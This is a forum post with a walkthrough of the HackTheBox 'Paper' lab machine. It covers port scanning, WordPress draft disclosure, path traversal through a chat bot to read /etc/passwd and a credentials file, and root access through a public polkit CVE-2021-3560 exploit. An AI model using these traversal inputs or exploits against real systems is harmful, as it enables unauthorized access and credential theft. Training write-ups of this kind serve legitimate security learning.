Return to forum
Paper HTB Writeup
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 3
Threads: 0
Joined: N/A
Reputation: 0

#1
November 19, 2022 at 8:08 PM
Enjoy![code]NMAP┌──(root kali)-[~/Desktop]└─# nmap -sS -A -sC -sV -p- -T410.10.11.143Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 12:31 ESTNmap scan report for 10.10.11.143Host is up (0.24s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.0 (protocol 2.0)| ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9|_http-title: HTTP Server Test Page powered by CentOS443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9|_http-title: HTTP Server Test Page powered by CentOS| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US| Subject Alternative Name: DNS:localhost.localdomain| Not valid before: 2021-07-03T08:52:34|_Not valid after: 2022-07-08T10:32:34|_ssl-date: TLS randomness does not represent time| tls-alpn: |_ http/1.1No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.91%E=4%D=2/18%OT=22%CT=1%CU=36529%PV=Y%DS=2%DC=T%G=Y%TM=6210646OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPSOS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECNOS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%FOS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CDOS:=S)Network Distance: 2 hopsTRACEROUTE (using port 53/tcp)HOP RTT ADDRESS1 239.51 ms 10.10.14.12 239.64 ms 10.10.11.143OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 56.23 seconds After we can see the port 80 is open up , just navigate on it and with inspect element → network we can see a strange header. Add this domain in /etc/hosts and navigate on office.paper after we can notice that this subdomain run wordpress┌──(root kali)-[~/Desktop]└─# wpscan --url http://office.paper/ --enumerate u,ap_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.17 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://office.paper/ [10.10.11.143][+] Started: Fri Feb 22 13:12:02 2022Interesting Finding(s):[+] Headers| Interesting Entries:| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9| - X-Powered-By: PHP/7.2.24| - X-Backend-Server: office.paper| Found By: Headers (Passive Detection)| Confidence: 100%[+] WordPress readme found: http://office.paper/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).| Found By: Rss Generator (Passive Detection)| - http://office.paper/index.php/feed/, https://wordpress.org/?v=5.2.3| - http://office.paper/index.php/comments/feed/, https://wordpress.org/?v=5.2.3 And we can notice that the version is 5.2.3, now we can find a CVE for this version here: https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2 So we can use :http://office.paper/?static=1 And we got some disclosure:testMicheal please remove the secret from drafts for gods sake!Hello employees of Blunder Tiffin,Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.So, I kindly request you all to take your discussions from the public blog to a more private chat system.-Nick# Warning for MichaelMichael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -NickThreat Level MidnightA MOTION PICTURE SCREENPLAY,WRITTEN AND DIRECTED BYMICHAEL SCOTT[INT:DAY]Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….# Secret Registration URL of new Employee chat systemhttp://chat.office.paper/register/8qozr226AhkCHZdyY# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.# Also, stop looking at my drafts. Jeez! So now navigate on this website but remember to add it in /etc/hostshttp://chat.office.paper/register/8qozr226AhkCHZdyY Register an account here and login. After a little bit of time, a pop-up will appear with a chat general. Now we can see that this bot use his own command like this:Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.Most frequently asked questions include:- What time is it?- What new files are in your sales directory?- Why did the salesman crossed the road?- What's the content of file x in your sales directory? etc.Please note that I am a beta version and I still have some bugs to be fixed.How to use me ? :1. Small Talk:You can ask me how dwight's weekend was, or did he watched the game last night etc.eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?2. Joke:You can ask me Why the salesman crossed the road.eg: 'recyclops why did the salesman crossed the road?'<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>For security reasons, the access is limited to the Sales folder.3. Files:eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'4. List:You can ask me to list the files5. Time:You can ask me to what the time iseg: 'recyclops what time is it?' or just 'recyclops time' The bot use this recyclops For communicate with the localhost, but we can’t talk in this chat because is “read only” so, let’s communicate with the bot privately and try to use this command. recyclops file ../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinsystemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologinsystemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinpolkitd:x:998:996:User for polkitd:/:/sbin/nologingeoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologinrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologinqemu:x:107:107:qemu user:/:/sbin/nologinapache:x:48:48:Apache:/usr/share/httpd:/sbin/nologincockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologinpulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologinusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologinunbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologingluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologinchrony:x:993:987::/var/lib/chrony:/sbin/nologinlibstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologinsaslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologindnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologinradvd:x:75:75:radvd user:/:/sbin/nologinclevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologinpegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinsssd:x:983:981:User for sssd:/:/sbin/nologincolord:x:982:980:User for colord:/var/lib/colord:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinsetroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologinpipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologingnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologininsights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologinnginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologinmongod:x:976:974:mongod:/var/lib/mongo:/bin/falserocketchat:x:1001:1001::/home/rocketchat:/bin/bash:x:1004:1004::/home/:/bin/bash After that we can enumerate the user and we will find the correct password:recyclops file ../hubot/.envexport ROCKETCHAT_URL='http://127.0.0.1:48320'export ROCKETCHAT_USER=recyclopsexport ROCKETCHAT_PASSWORD=export ROCKETCHAT_USESSL=falseexport RESPOND_TO_DM=trueexport RESPOND_TO_EDITED=trueexport PORT=8000export BIND_ADDRESS=127.0.0.1 Now we can login in ssh!! with this password! Command injection successfully.[@paper ~]$ cat user.txt FLAG HERE :)VERTICAL PRIVESC Now we can notice a file, in the user directory that recall an exploit:print("Exploit: Privilege escalation with polkit - CVE-2021-3560")print("Exploit code written by Ahmad Almorabea @almorabea")print("Original exploit author: Kevin Backhouse ")print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")print ("**************")print("[+] Starting the Exploit ") Download this exploit and use it several times[@paper ~]$ python3 CVE-2021-3560.py **************Exploit: Privilege escalation with polkit - CVE-2021-3560Exploit code written by Ahmad Almorabea @almorabeaOriginal exploit author: Kevin Backhouse For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/**************[+] Starting the Exploit [+] User Created with the name of ahmed[+] Timed out at: 0.008008275505860037[+] Timed out at: 0.00782768600159978[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root bash: cannot set terminal process group (118347): Inappropriate ioctl for devicebash: no job control in this shell[root@paper ]# whoami;idrootuid=0(root) gid=0(root) groups=0(root)Got we are ROOT[/code]
Reply


 Users viewing this thread: Paper HTB Writeup: No users currently viewing.